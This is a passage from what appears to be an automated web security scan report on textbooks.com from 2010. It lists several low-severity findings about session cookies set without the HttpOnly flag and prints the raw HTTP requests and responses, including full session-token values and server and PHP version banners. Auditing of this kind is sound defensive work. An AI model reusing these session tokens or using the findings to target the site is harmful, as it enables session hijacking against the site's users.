C%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=r8wgw2O3LRvekHnnSCinxzMGvHch1ZumiUZuZ%2FyCQO8FR7%2Bj2lwFw%2BaEgnFb0FVASMV62J29dLbD3ERoy%2FqQ0TmEINT4kI3WrPXh9%2FL%2FlHjpIlZMGrTmS8gaVO1NCuWiC8JzPYv7hXujuH57rDAeiIarCGifKvBFGamTFNiaJXZ6hTs1TbRdTv4c7NG%2BJNIO299OLfsRFMyqB2b7TLgyYWjU1pxnyfDFvogj3j6FjoEEGnQjebI%2BSnXXO8QfyHC2MIqXvctl0qm2dxYU5bxsCJYsWiEYZKK%2FEcZcD9fqDlnekZPV%2FtvipiJhnkDjbq5Gq1dyMhMt6v6mJLDbvtocozMG4hrfj9ljfrUk4YgL4OKLHoBvcVLq9qk0X10I9fgAgneCqFCl08kFJisbeXAqd8%2FvgbsGvdwR48%2BVc3aOg1YxXQh0KDFlyhLSbV2CovOOLI2Zqoln%2FWfqvd%2FbpPgynWR%2BiYw8r8iXPyRu0Y2YjsxZ61oYybwoTlR2%2BLwiZKS%2B8YS%2Bdef4nl%2FTKeuqHMlQlycqoSH11aUhmACBFvQZBT5QuWKg4uC4IrcjwT3THq%2BAOLcNe2JDR3teW53EY9HVNMpM3PxyKloEG%2BI278WPRTJRS7PcEokchzPLsV6P9iVRE8pzhWJ07Yt40TJ0tbkxgOLJ3Rnl9u%2FUdtvLI0IJaDle2WUoNyYZWThghEHElv5ed7T8lCS9JWXhB5SedvWEGuzZZzLoHhum6wup4fnEdM7kvp7e9lbpMepQYzMXwb244Ey9YYhJiASnXk%2BS0kwSXJrDSj4Nv8rQQr16MWkmfSIcjzpjL1CjrginwZMsTumgzpxdiZYBq5wAE2b4cLPZpYiC79%2Bu6wP%2FeA2kyVMp4szfNJSU%2BdmlUDkMlmcZRoFr2RB%2FirehTIbzbQIx63ZEcd5H9f7qci6%2BaSZdMtC%2FqeyfJPuhX%2B7IVup3xo%2BE6PUemTJbna%2FTFbny3TjgF5qvC8%2Bidb0rEZpsOVk%2B0t1v6XQzM2TcZZkMMWYdKAPm0uwc1AXbiFgYyt6fPq94QFlszqdKbiZDgEhQSDCS3yj8%2FMpEJ9oPwuGNB2iVjLcoy1rZ8dUdotmAEKdKaAbdkZaGzxlsXQ3IktqqbUCP0IQ6oTKgOyBEBLu5xQkMnPVk2wkHK8Xby70hJqvibpCPowktXUetw0J3ZDx79NJv3SdJ3PYP7TZc6VLsIFf%2FyC4%2FXE5i7kiukEbLsC%2FHrjQz3dKX4qTBre7X8Jq8SfdwecfeCg30NiLMfxeh4kulrs8%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=jmetkS3kpyLzouadTgQ%3D; expires=Mon, 26-Dec-2011 13:51:58 GMT; path=/; domain=.textbooks.com
Content-Length: 38984


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.26. http://www.textbooks.com/sell-textbooks.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /sell-textbooks.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sell-textbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:51:57 GMT
Set-Cookie: TBSESSION=RCVA2ltk80NW5Jf0Wl2Hp4znffWSrQPDUOtKIA0u%2FqlL%2FjYVd9r7rK57RoHO3klBemBEgmBjtjvqvzgYhIp7eeLgDA0I9MrFfURtlqwtx2BKN1IzFW4VuXlqki%2FIkLRfXjm71k0alz0rL9l4RKuXms1dz6YxpQlfct0kt2KO0nEqx9%2BJZwh8ydTHKfsSpN7asjXPWt9h1ZwYKBsJpAeil6JLAb91657JBthMgkmCg1dWpyOFt%2BO2%2F6IuWFiBvyfeDqld2XYdPmwncoE8r6H%2BiVS5foiEy7Obglt6qPLPrO8CnwOaGcTCUn9GIPasy266mXMSTxo0ZHFN5z7D%2FMi15PhmDLLLcVW9NDAa%2FZtn0z7Aic55u9ajBWXJje2dG5j%2Bwex47GhkRb8SCxa3h9eYD%2BFF8ODsBw8fKdAE9fJhe5sX%2BGSaDH%2BblHWcaDvOD%2BuAHHVC9867%2B8IVRD9A32ieqt2eWyCzXbPmyuAst2gKg8riGQ%2Bd0lFPTMmQkk%2FNvKgMcR5uxwUaiYK8OrTmO73yRrtAUjTDKt2fg5h2DMXa4g%2FUFbpL%2FBacwzt9qk6Qb4HbW2ALDFrKULxNGBQ0zGDrCy%2B0gRX%2ByS0XNKnGUzF%2FjsRLCRxSbeGmexVSotL%2FxQC7HJGtLp0EJGcsuyMXOTyFUuCvkxrHpaa8TjORbwlnxc33ZKOZYz9oh21tfBmWeSFFiQzRBMMMgGLgIMst99cK6FRxOPUF0Y9fQuKqJVCeEwCD8Ap6XRE0LwljO69yT6txlmkuUYSR5czrJH87PwlN%2B6EOzOJSQx05kVzChR8bdRUIacjCSLcxPeBAdFuHDsDAoOMGLxcRafAmk1RtanCiUFE6YO2rXCOjadz7bR%2FxELgt%2BLrYjgq8Nt%2FZ70rAyyE4Qbwm1XKfIy8i0YqG3jmQ6I6ZQyps%2FWburUYbt7DYRjkSxUE%2F%2BDleyB4Pv7WZEJ0v8z7v3lVDq0sfn%2BxvMZVWAfF1gee3wmf2nKxU87adO9iljyBUVtjb1%2BYSuwnjro4eSz0oeR4WFBqfyp%2BeHZmSIavq3Y00rvB6zoqcbqZ4i4eoe1gJc3vVBuz9n5gP4BMqLMl%2FEbWIywFxbZFNv1M8OlyfFZBbl9kpUzfdnC1HrJFyHp%2BM%2B9LbayuCXGHH4s8wF4ancGqr2XUICaF9IngzURcvFPuEULoLBBd4H%2FCqrbpoJdoSs5%2Fbn6H2UYrgjEbyataNxKwmptLaIAGUWe6CNKE68aVDc8TV88fKIkK0LJm8vRfrr4clbcysIn4%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=skRZMuAwUsugbpdzDo0%3D; expires=Mon, 26-Dec-2011 13:51:58 GMT; path=/; domain=.textbooks.com
Content-Length: 36639


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.27. https://www.textbooks.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=ZX8GKynTOuWErN2bcxdglGgKUSVXmfokmfizdb6fXTI%2BkR6D8IpmlJEj8xLbFZnS%2BJJGCtOuN%2FOKVTrOLZcOjsEyXvfO3m%2FWjiS3Tov2DxWx9fYSBrvdGp1zFD%2BnDX4xGxk1gggjoyAKhSzCtlGPUE6nWxB1csyqQN49pxfSslBvn6mLxmBpHtLY2qr5rtRu9tnlKVxOXq7%2FlHpIlh5xb4ra9riQLAee%2FazWSBVImIIDygqP7JOCyi6pFbzhv9vg%2FS0Sg3qb1xgVTopYw%2BaVBJ22tR1fBdfZmD7U44lVQInfrgOocBPveCj%2B7GY2C0J8oh%2BZVK9Xt1%2FzOM0DBLjPABq1sI%2BiMRhJJrfgsS3iPVywEwpg%2F78enCbB2lHrUmr%2F7Lw3c5pV7kLIP%2FEEHyAbsSI9qhrUO1aAYrSPF7TcIiKJy0v1aMpBnUxS6NEF1Jdlpe8SXxtioOeQSmm1MeCzJnTK%2BQgoHNyZe4GIRgmzWKiWy4JjMdtuR1KYjgTFXn4l0nrhzC0HPucbs8NP%2FksPlrq%2BEC%2BNotrXpkmBW8G9fryo6eUnfBOJFg6vKHxLPbPuJBECFWXyOdR%2BqXpZdJazoXunYU1UxyscQzPrneA5uvC%2FxLBEn2QwJJGlXdmVR1Q5cA7tNdCc%2Bcu1Me0cycGyudiSiiyCJEwVsXhU3jxSS7r%2B6zpbwHKFwdEUEZcoNJvwZuinnH020ZwqBqODaagXOsOoW9JBCcUrqSx7ZiFrd7O8xoDt7aBSXwyk7AcvSw%2BEZUJN3Vku51lf2Pv%2Fa7MKxWN4sYPWZbBw5KF4soeZ0%2Fvnq2lMMJYoGjUjvd%2BaDZeJSpTafw3qbOe%2FvQiTCkxkEySfXUllj8UI2b82MFZBC6nPV3te%2BOzRsT7D3bgZ3JULOFVZnYK3NNfmkQvW7w7PWd%2FcaqffTehBhIMhdPQcED7H7X5RO7M84QxIn0rnhyNsDWFMmJ1433jiBv4H71uqgQfEBtmMqu9dMOyXG4SkVJoia5HgtyWaejvNKkYBhsqc0DnJ0XPJ8GvSlToFgL3O2iMRulEwx%2FxUuCi0oX0gyMm%2FdUj4ASoSPZcLR7MGHdnmpCHYuxrIEcxmin75yo13LkVZCbZyNWHUWG6NBN15WVJgJ3COQlGxX8lBuInrftfMkqy4tGZ%2BHBZRrFGTm8ULKVJXPjqLOCqcc1gk3hk1KgDCsZEe4XIyBnLVY6zU62RlabQRw8iypVhzrzZDdHBPOTcaAuNXPPnO3Zj13u7ZCzzXPk1ipoRZtpBeOPU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=b%2Bc21UkT1sQaFcBDQHk%3D; expires=Mon, 26-Dec-2011 13:51:33 GMT; path=/; domain=.textbooks.com
Content-Length: 35362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.28. https://www.textbooks.com/account.php

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /account.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:27 GMT
Set-Cookie: TBSESSION=HcVwmiPPLgvSivqJfoVmbt5gEZEgOp9Y6lox26AAXxDEjyif4Rkxly04sOZvg82jolcnT4y6M%2BzialsUEUiwtzC0zrDbjKsCRQsp6nd0%2BYtymVfLwc1Yl1g5o907kAXdJIgxb0amVLjTSzKlHgNQRwbvpNwW76WEWfJgBamgPBB1CyWrWBKzeeKIhhY343NcQGrHiNaXnjrKVHVu%2Bo1FGhpfdJaYnCAfOIJQWUtjeAhtQIj4quQwNpSvMYD1b8TmjOhnYOWRnvTXeqm5NHUK7qQq%2FjkS5iz60x3gyYSEBVIhshq7j7g4YM0YXpFUYZDYHOEpSIGyenfLHHsn02GIkFloCqa4AuzSEi8ZsCHgjI8mVN45YshZiUjIF7tAwShLwqZZ10UTxjftbLiTqUtgMOcN67A07SzT%2Bm0CKRleBxf9wiQQ%2FvyPtCYTJvei%2B5mqLbm991T4AxxBpJaEI%2BUgDwazAslsjkY4JIUy7YLGVJwu%2FBujjdU%2FTicgb%2Ff1z50%2Bpdn%2BLvuTlVyZfbbcaO6yutU55v6C1IJgRNCR%2FPIT0AqXdLBtKmafMSR%2BWspB3f1XB%2BauptSiRiRi93k1tJ2TwXiBPYKI%2BRJiptUrodZoDdGPwSkW63j4HAsLMpEEwfVov%2FvhWHHnjXic9UZVVGm7ulnspI3MlyxiuyEkDmJ1H8fhwSKQmtApkbumDH3pkz2D7kQSsglPowig%2FdlGUHoKTCNU573VqDUMoTeMAR7XhCZ6v4S4ViJnwVtKsv38xYZRzTijBe7xXX%2F4N0dVw7HgjK2xAYd2fNmOqn%2BX8H9BXQATUukdlq35nT%2FxoAVQqKcq046rXaTIcEraJgyGeFWZjugdBW%2BRPcqdZCrFw04L6LLv6r9TYvHwV%2Fg%2BlPBxSUjhQ1Wxu89rfRkRYFK036RbCcN%2B%2BDhOv%2Bnrvq6Lj2%2F8kO1AuI%2BMXWikfGbD4%2B03CwVPLlEHLKQI4cXZ9slTe%2Fzqvbh9Gd1Qurod%2FlXpNHZbgZ2U%2BM0pEnAmLIL93PWUT4ArNJHraqKPWK31tkUf1%2FDNmOW8xoEmwRBTC5GWmn9uiQVx5CT4QM8ecUE8hSiWxuveHAUMCzEDL9S7n6OlrWM856CqXGQKpQfittBjcx4mixKTRRV4yO8aLteM3jw3BpT45djSHDbibcFUVoM8ZzdrStw9PbT2JLjG6PlxHnjuXl7mNADGH6oIrppH1mDuh%2Bi0xp0uRXcgEgYyUFcHHmQlYllBMMLpj7A0AzPTtuvk7mCLB3xCiydJVPQZPGk%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=m2sT%2BeW4bxWwrRneS60%3D; expires=Mon, 26-Dec-2011 13:53:28 GMT; path=/; domain=.textbooks.com
Content-Length: 33655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.29. https://www.textbooks.com/checkout.php

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /checkout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /checkout.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:30 GMT
Content-Length: 24992
Connection: close
